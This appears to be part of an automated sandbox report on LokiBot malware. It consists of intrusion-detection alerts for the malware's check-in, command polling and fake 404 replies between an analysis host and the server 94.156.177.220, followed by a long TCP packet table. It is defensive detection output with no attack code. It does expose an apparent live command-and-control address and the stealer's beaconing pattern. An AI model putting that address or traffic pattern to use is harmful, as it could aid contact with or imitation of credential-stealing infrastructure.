2024-10-27T08:51:51.110434+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50060	94.156.177.220	80	TCP
2024-10-27T08:51:51.110434+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50060	94.156.177.220	80	TCP
2024-10-27T08:51:52.086390+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50060	94.156.177.220	80	TCP
2024-10-27T08:51:52.086390+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50060	94.156.177.220	80	TCP
2024-10-27T08:51:52.092366+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	50060	TCP
2024-10-27T08:51:52.277798+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50061	94.156.177.220	80	TCP
2024-10-27T08:51:52.277798+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50061	94.156.177.220	80	TCP
2024-10-27T08:51:52.277798+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50061	94.156.177.220	80	TCP
2024-10-27T08:51:53.279747+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50061	94.156.177.220	80	TCP
2024-10-27T08:51:53.279747+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50061	94.156.177.220	80	TCP
2024-10-27T08:51:53.285458+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	50061	TCP
2024-10-27T08:51:53.448342+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50062	94.156.177.220	80	TCP
2024-10-27T08:51:53.448342+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50062	94.156.177.220	80	TCP
2024-10-27T08:51:53.448342+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50062	94.156.177.220	80	TCP
2024-10-27T08:51:54.432804+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50062	94.156.177.220	80	TCP
2024-10-27T08:51:54.432804+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50062	94.156.177.220	80	TCP
2024-10-27T08:51:54.438687+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	50062	TCP
2024-10-27T08:51:54.657779+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50063	94.156.177.220	80	TCP
2024-10-27T08:51:54.657779+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50063	94.156.177.220	80	TCP
2024-10-27T08:51:54.657779+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50063	94.156.177.220	80	TCP
2024-10-27T08:51:55.643652+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50063	94.156.177.220	80	TCP
2024-10-27T08:51:55.643652+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50063	94.156.177.220	80	TCP
2024-10-27T08:51:55.649813+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	50063	TCP
2024-10-27T08:51:55.818063+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50064	94.156.177.220	80	TCP
2024-10-27T08:51:55.818063+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50064	94.156.177.220	80	TCP
2024-10-27T08:51:55.818063+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50064	94.156.177.220	80	TCP
2024-10-27T08:51:56.780487+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50064	94.156.177.220	80	TCP
2024-10-27T08:51:56.780487+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50064	94.156.177.220	80	TCP
2024-10-27T08:51:56.786328+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	50064	TCP
2024-10-27T08:51:57.259902+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50065	94.156.177.220	80	TCP
2024-10-27T08:51:57.259902+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50065	94.156.177.220	80	TCP
2024-10-27T08:51:57.259902+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50065	94.156.177.220	80	TCP
2024-10-27T08:51:58.233352+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50065	94.156.177.220	80	TCP
2024-10-27T08:51:58.233352+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50065	94.156.177.220	80	TCP
2024-10-27T08:51:58.240106+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	50065	TCP
2024-10-27T08:51:58.416005+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50066	94.156.177.220	80	TCP
2024-10-27T08:51:58.416005+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50066	94.156.177.220	80	TCP
2024-10-27T08:51:58.416005+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50066	94.156.177.220	80	TCP
2024-10-27T08:51:59.409762+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50066	94.156.177.220	80	TCP
2024-10-27T08:51:59.409762+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50066	94.156.177.220	80	TCP
2024-10-27T08:51:59.415459+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	50066	TCP
2024-10-27T08:51:59.584177+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50067	94.156.177.220	80	TCP
2024-10-27T08:51:59.584177+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50067	94.156.177.220	80	TCP
2024-10-27T08:51:59.584177+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50067	94.156.177.220	80	TCP
2024-10-27T08:52:00.558856+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50067	94.156.177.220	80	TCP
2024-10-27T08:52:00.558856+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50067	94.156.177.220	80	TCP
2024-10-27T08:52:00.565164+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	50067	TCP
2024-10-27T08:52:00.744111+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50068	94.156.177.220	80	TCP
2024-10-27T08:52:00.744111+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50068	94.156.177.220	80	TCP
2024-10-27T08:52:00.744111+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50068	94.156.177.220	80	TCP
2024-10-27T08:52:01.715149+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50068	94.156.177.220	80	TCP
2024-10-27T08:52:01.715149+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50068	94.156.177.220	80	TCP
2024-10-27T08:52:01.720954+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	50068	TCP
2024-10-27T08:52:02.147704+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50069	94.156.177.220	80	TCP
2024-10-27T08:52:02.147704+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50069	94.156.177.220	80	TCP
2024-10-27T08:52:02.147704+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50069	94.156.177.220	80	TCP
2024-10-27T08:52:03.098066+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50069	94.156.177.220	80	TCP
2024-10-27T08:52:03.098066+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50069	94.156.177.220	80	TCP
2024-10-27T08:52:03.103857+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	50069	TCP
2024-10-27T08:52:03.273450+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50070	94.156.177.220	80	TCP
2024-10-27T08:52:03.273450+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50070	94.156.177.220	80	TCP
2024-10-27T08:52:03.273450+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50070	94.156.177.220	80	TCP
2024-10-27T08:52:04.229607+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50070	94.156.177.220	80	TCP
2024-10-27T08:52:04.229607+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50070	94.156.177.220	80	TCP
2024-10-27T08:52:04.235519+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	50070	TCP
2024-10-27T08:52:05.224737+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50071	94.156.177.220	80	TCP
2024-10-27T08:52:05.224737+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50071	94.156.177.220	80	TCP
2024-10-27T08:52:05.224737+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50071	94.156.177.220	80	TCP
2024-10-27T08:52:06.200494+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50071	94.156.177.220	80	TCP
2024-10-27T08:52:06.200494+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50071	94.156.177.220	80	TCP
2024-10-27T08:52:06.207503+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	50071	TCP
2024-10-27T08:52:06.371984+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50072	94.156.177.220	80	TCP
2024-10-27T08:52:06.371984+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50072	94.156.177.220	80	TCP
2024-10-27T08:52:06.371984+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50072	94.156.177.220	80	TCP
2024-10-27T08:52:07.344016+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50072	94.156.177.220	80	TCP
2024-10-27T08:52:07.344016+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50072	94.156.177.220	80	TCP
2024-10-27T08:52:07.349781+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	50072	TCP
2024-10-27T08:52:07.611756+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50073	94.156.177.220	80	TCP
2024-10-27T08:52:07.611756+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50073	94.156.177.220	80	TCP
2024-10-27T08:52:07.611756+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50073	94.156.177.220	80	TCP
2024-10-27T08:52:08.623892+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50073	94.156.177.220	80	TCP
2024-10-27T08:52:08.623892+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50073	94.156.177.220	80	TCP
2024-10-27T08:52:08.749718+0100	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.5	50073	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 27, 2024 08:50:12.860771894 CET	49704	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:12.866341114 CET	80	49704	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:12.866446972 CET	49704	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:12.868511915 CET	49704	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:12.873951912 CET	80	49704	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:12.874031067 CET	49704	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:12.879407883 CET	80	49704	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:13.840903044 CET	80	49704	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:13.849293947 CET	49704	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:13.855293036 CET	80	49704	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:13.855376005 CET	49704	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:14.040782928 CET	49705	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:14.046387911 CET	80	49705	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:14.046499968 CET	49705	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:14.048495054 CET	49705	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:14.053947926 CET	80	49705	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:14.054014921 CET	49705	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:14.059403896 CET	80	49705	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:15.023091078 CET	80	49705	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:15.023333073 CET	49705	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:15.030177116 CET	80	49705	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:15.030250072 CET	49705	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:15.085382938 CET	49706	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:15.091308117 CET	80	49706	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:15.091557980 CET	49706	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:15.093585968 CET	49706	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:15.099195004 CET	80	49706	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:15.099443913 CET	49706	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:15.105549097 CET	80	49706	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:16.056801081 CET	80	49706	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:16.057099104 CET	49706	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:16.063034058 CET	80	49706	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:16.063121080 CET	49706	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:16.319909096 CET	49707	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:16.325392008 CET	80	49707	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:16.325500011 CET	49707	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:16.339914083 CET	49707	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:16.345302105 CET	80	49707	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:16.345385075 CET	49707	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:16.350924969 CET	80	49707	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:17.328974962 CET	80	49707	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:17.329127073 CET	49707	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:17.334760904 CET	80	49707	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:17.334841967 CET	49707	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:17.468652010 CET	49708	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:17.474129915 CET	80	49708	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:17.474247932 CET	49708	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:17.476193905 CET	49708	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:17.481580019 CET	80	49708	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:17.481650114 CET	49708	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:17.487025023 CET	80	49708	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:18.456502914 CET	80	49708	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:18.456660986 CET	49708	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:18.462464094 CET	80	49708	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:18.462532997 CET	49708	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:18.607512951 CET	49711	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:18.612935066 CET	80	49711	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:18.613044024 CET	49711	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:18.615168095 CET	49711	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:18.620503902 CET	80	49711	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:18.620574951 CET	49711	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:18.626024961 CET	80	49711	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:19.575421095 CET	80	49711	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:19.575557947 CET	49711	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:19.581587076 CET	80	49711	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:19.581648111 CET	49711	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:19.720877886 CET	49714	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:19.726252079 CET	80	49714	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:19.726345062 CET	49714	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:19.728496075 CET	49714	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:19.733875990 CET	80	49714	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:19.733946085 CET	49714	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:19.739347935 CET	80	49714	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:20.689227104 CET	80	49714	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:20.689378977 CET	49714	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:20.695627928 CET	80	49714	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:20.695786953 CET	49714	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:20.847134113 CET	49718	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:20.852593899 CET	80	49718	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:20.852766037 CET	49718	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:20.857235909 CET	49718	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:20.862654924 CET	80	49718	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:20.863635063 CET	49718	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:20.869010925 CET	80	49718	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:21.807653904 CET	80	49718	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:21.807779074 CET	49718	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:21.813380003 CET	80	49718	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:21.813452959 CET	49718	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:21.962357044 CET	49720	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:21.967753887 CET	80	49720	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:21.968142986 CET	49720	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:21.973035097 CET	49720	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:21.978817940 CET	80	49720	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:21.978873014 CET	49720	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:21.984421968 CET	80	49720	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:22.948069096 CET	80	49720	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:22.948230982 CET	49720	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:22.953855038 CET	80	49720	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:22.953943968 CET	49720	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:23.098753929 CET	49726	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:23.104146004 CET	80	49726	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:23.104290962 CET	49726	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:23.106225967 CET	49726	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:23.111579895 CET	80	49726	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:23.111640930 CET	49726	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:23.116964102 CET	80	49726	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:24.072727919 CET	80	49726	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:24.074551105 CET	49726	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:24.080454111 CET	80	49726	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:24.082477093 CET	49726	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:24.268465996 CET	49732	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:24.273911953 CET	80	49732	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:24.274224997 CET	49732	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:24.276216984 CET	49732	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:24.281542063 CET	80	49732	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:24.282179117 CET	49732	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:24.287554026 CET	80	49732	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:25.251010895 CET	80	49732	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:25.251157999 CET	49732	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:25.257091999 CET	80	49732	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:25.257164001 CET	49732	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:25.396339893 CET	49742	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:25.401892900 CET	80	49742	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:25.401972055 CET	49742	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:25.404937983 CET	49742	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:25.410419941 CET	80	49742	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:25.410505056 CET	49742	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:25.415986061 CET	80	49742	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:26.359535933 CET	80	49742	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:26.359659910 CET	49742	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:26.366084099 CET	80	49742	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:26.366147995 CET	49742	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:26.513669968 CET	49749	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:26.519140005 CET	80	49749	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:26.519263983 CET	49749	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:26.521871090 CET	49749	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:26.527192116 CET	80	49749	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:26.527265072 CET	49749	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:26.532596111 CET	80	49749	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:27.488437891 CET	80	49749	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:27.488641977 CET	49749	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:27.494385004 CET	80	49749	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:27.494467020 CET	49749	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:27.662956953 CET	49755	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:27.668292046 CET	80	49755	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:27.668370008 CET	49755	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:27.670346022 CET	49755	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:27.675676107 CET	80	49755	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:27.675771952 CET	49755	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:27.681126118 CET	80	49755	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:28.665159941 CET	80	49755	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:28.665275097 CET	49755	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:28.670968056 CET	80	49755	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:28.671045065 CET	49755	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:28.812769890 CET	49761	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:28.818118095 CET	80	49761	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:28.818218946 CET	49761	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:28.820449114 CET	49761	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:28.825783014 CET	80	49761	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:28.825870037 CET	49761	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:28.832695961 CET	80	49761	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:29.791338921 CET	80	49761	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:29.791485071 CET	49761	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:29.797185898 CET	80	49761	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:29.797246933 CET	49761	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:29.942637920 CET	49771	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:29.948225021 CET	80	49771	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:29.948322058 CET	49771	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:29.950134993 CET	49771	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:29.955518007 CET	80	49771	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:29.955585957 CET	49771	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:29.960884094 CET	80	49771	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:31.109859943 CET	80	49771	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:31.109987974 CET	49771	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:31.110507965 CET	80	49771	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:31.110563993 CET	49771	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:31.115398884 CET	80	49771	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:31.253895044 CET	49778	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:31.259424925 CET	80	49778	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:31.262054920 CET	49778	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:31.263901949 CET	49778	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:31.269253016 CET	80	49778	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:31.270533085 CET	49778	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:31.275897980 CET	80	49778	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:32.248469114 CET	80	49778	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:32.248565912 CET	49778	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:32.254669905 CET	80	49778	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:32.254738092 CET	49778	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:32.389303923 CET	49784	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:32.395188093 CET	80	49784	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:32.395296097 CET	49784	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:32.397342920 CET	49784	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:32.403166056 CET	80	49784	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:32.403234005 CET	49784	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:32.408952951 CET	80	49784	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:33.366935968 CET	80	49784	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:33.388048887 CET	49784	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:33.393934965 CET	80	49784	94.156.177.220	192.168.2.5
Oct 27, 2024 08:50:33.394006968 CET	49784	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:33.653247118 CET	49792	80	192.168.2.5	94.156.177.220
Oct 27, 2024 08:50:33.658660889 CET	80	49792	94.156.177.220	192.168.2.5
